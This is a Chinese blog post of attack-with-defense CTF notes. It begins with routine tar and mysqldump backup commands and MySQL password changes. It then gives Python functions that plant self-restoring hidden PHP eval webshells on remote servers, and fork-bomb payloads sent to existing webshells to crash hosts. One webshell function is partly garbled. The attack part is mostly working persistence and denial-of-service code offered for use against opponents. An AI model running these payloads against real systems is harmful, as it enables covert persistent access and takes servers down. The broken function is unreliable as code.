0x00 refer

https://www.jagger2zr.com/2019/08/30/AWD%E8%B5%B7%E6%89%8B%E5%BC%8F%E5%8F%8A%E6%AF%94%E8%B5%9B%E6%80%BB%E7%BB%93/

0x0起手

源码

压缩命令:tar -zcvf www.tar.gz .

解压命令:tar -xvxf www.tar.gz -C .

也可直接xshell转,一般很快

数据库

cd /var/lib/mysql

mysqldump -u root -p Test>Test0809.sql

mysql -u root -p Test<Test0809.sql,输入密码即可(将要恢复的数据库文件放到服务器的某个目录下,并进入这个目录执行以上命令|)

mysqldump -uroot -p --single-transaction --all-databases > backup.sql #所有
mysqldump -u root -p --single-transaction dataname > dataname.sql #单个

#遇到加锁的情况:
mysqldump --skip-lock-tables -uxxxx -p -h 166.111.9.173 -R urlevent20180319 > ./backup.sql

`mysqldump -h127.0.0.1 -uroot -ppassword database |gzip > $backupDir/$database-$today.sql.gz`

授权

GRANT ALL PRIVILEGES ON *.* TO root@localhost IDENTIFIED BY "ysx123456";
flush privileges;

改密码

update mysql.user set password=PASSWORD('123456') where user='root';
flush privileges;

0x02 权限控制

写不死马

  • eval型

    def write_memery_webshell(url, directory, password): 
        sleep_time = 500 # micro second 
        code = "<?php $content = '<?php eval(base64_decode($_REQUEST[%s]));?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0);      while(true){ if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
        filename = ".%s.php" % (password)
        path = "%s/%s" % (directory, filename)
        payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", "")) 
        print payload 
        return code_exec(url, payload).split("\n")[0:-1]
  • 命令型

def write_memery_webshell(url, directory, password): 
    sleep_time = 500 # micro second 
    code = "<?php                                       ?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0); while(true){      if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time) 
    filename = ".%s.php" % (password) 
    path = "%s/%s" % (directory, filename) 
    payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", "")) 
    return shell_exec(url, payload).split("\n")[0:-1]
  • 唤醒内存马
def active_memery_webshell(url): 
    try: 
        requests.get(url, timeout=0.5) 
    except: 
        print "[+] OK!"

fork炸弹

  • eval型

    def eval_fork(ip): 
        host = ip
        port = "80" 
        url = "http://%s:%s/code.php" % (host, port) 
        code = "system(\"echo '.() { .|.& } && .' > /tmp/aaa\");system(\"/bin/bash /tmp/aaa\");echo \"seems good!\";" 
        data = {'pass':code}
        requests.post(url, data=data)
  • 命令型

    def shell_fork(ip): 
        host = ip
        port = "80" 
        url = "http://%s:%s/c.php" % (host, port) 
        command = ":(){ :|: & };:" 
        shell_exec(url, command)

0x03 流量

脏流量


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!

基本功 Next